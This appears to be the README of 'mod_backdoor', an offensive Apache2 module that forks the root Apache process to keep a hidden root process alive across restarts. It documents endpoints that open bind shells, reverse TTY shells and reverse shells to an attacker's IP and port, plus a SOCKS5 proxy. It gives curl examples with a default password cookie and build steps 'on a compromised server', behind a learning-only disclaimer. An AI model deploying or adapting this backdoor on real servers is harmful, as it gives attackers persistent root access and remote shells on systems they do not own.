Home

Awesome

Apache2 mod_backdoor

mod_backdoor is a stealth backdoor using an Apache2 module.<br/> The main idea is to fork() the primary Apache2 process just after it has loaded its config. Since it's forked before the root user transfers the process to www-data, you can execute command as root.<br/> As Apache2 loads its configuration only when you (re)start it, the challenge was to never let die this forked root apache2 process, to let us interact as root with the compromised system.

Features

Demo

asciicast

Description

On non-systemd systems, it should work aswell. The main differences are, with systemd, the IPC socket is stored in a private /tmp/.</br> This private /tmp is automatically cleaned up when apache2 <stop || restart>. Systemd automatically kills all instance of apache2 when you ask for a <stop || restart> .<br/> <br/> This is not the same behavior with init-like systems. There isn't private /tmp for the application, so the IPC socket is created in the public /tmp.<br/> The init service script doesn't know the PID of the forked root apache2 process, so our root process will not be killed by the script.<br/> It means apache2 won't restart automatically because there is already a process listening on port 80 (our root process). And if you kill it manually, the forked root apache2 process won't bind to IPC socket because it tries to create another one on the same place (I've not handled the error \o/ ).<br/> <br/> The workaround I've found is to replace the /var/run/apache2/apache2.pid with the PID of our forked root apache2 process and save the original one.<br/> Doing so, it allows catching signal for a process you don't own:<br/> --> Overwrite signal handler for SIGTERM / SIGKILL in order to :

The path /var/run/apache2/apache2.pid is stored in the environment variable: APACHE_PID_FILE <br/>

If you have a better idea for init-like system, feel free to contact me (or PR) ! <br/>

The apache2 server needs to be compiled with the mod_so to allow Dynamic Shared Object (DSO) support.

Bind TTY Shell

The endpoint  http[s]://<TARGET>/bind/<PORT> binds a listening port on <TARGET>:<PORT> <br/> When a connection is initiated to the listening port, the port closes. <br/> forkpty() is used to obtain a native TTY shell, working with an IPC UNIX socket to communicate between forked TTY process and the new socket you just opened.<br/> Shells could be easily upgraded with the famous trick:<br/> CTRL-Z --> stty raw -echo --> fg --> reset

Reverse TTY Shell

It works like the bind shell, the endpoint http[s]://<TARGET>/revtty/<IP>/<PORT> returns a TTY shell to <IP>:<PORT> <br/>

Reverse Shell (No TTY)

The endpoint http[s]://<TARGET>/reverse/<IP>/<PORT>/<PROG> returns a shell to <IP>:<PORT>. <br/> <PROG> must be one of these: <br/>

<p align="center">
NativeExternal
shphp
bashpython
dashruby
ashperl
tcsh
ksh
</p>

<PROG> must be in lower-case.<br/> PHP uses the exec function.<br/> Ruby isn't using /bin/sh.

Socks5 proxy

Source code comes from https://github.com/rofl0r/microsocks <br/> The endpoint http[s]://<TARGET>/proxy/<PORT>/<USER> opens a socks5 proxy on <PORT>. <USER> is optional. If you set it, it activates the auth mode. Password is the same as the mod_backdoor.<br/> Once a specific ip address authed successfully with user:pass, it is added to a whitelist and may use the proxy without auth. This is handy for programs like firefox that don't support user:pass auth.<br/> For it to work you'd basically make one connection with another program that supports it, and then you can use firefox too.<br/> Example:<br/>

  1. curl -H 'Cookie: password=backdoor' http://<TARGET>/proxy/1337/vlad <br/> --> Start socks proxy on port 1337 for vlad user
  2. curl -x socks5://vlad:password=backdoor@<TARGET>:1337 https://www.google.com <br/> --> Register your IP address
  3. You could now use it without auth
  4. When you're done, you can kill the socks proxy by sending imdonewithyou in a socket <br/> --> echo "imdonewithyou" | nc <TARGET> 1337

Ping module

The endpoint http[s]://<TARGET>/ping tells you if the module is currently working.

Notes

Apache2 Module Backdoor is inspired from Ringbuilder, created by Juan Manuel Fernandez (@TheXC3LL)<br/> More info about Ringbuilder:<br/> https://github.com/TarlogicSecurity/mod_ringbuilder <br/> https://www.tarlogic.com/en/blog/backdoors-modulos-apache/ <br/>

Socks5 code was adapted from https://github.com/rofl0r/microsocks <br/> <br/> Special thanks to @Ug_0Security

Builds

For development :<br/>

On a compromised server :<br/>

Author

Vlad Rico (@RicoVlad)

Disclaimer

This project was created only for learning purpose.<br/> Usage of mod_backdoor for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.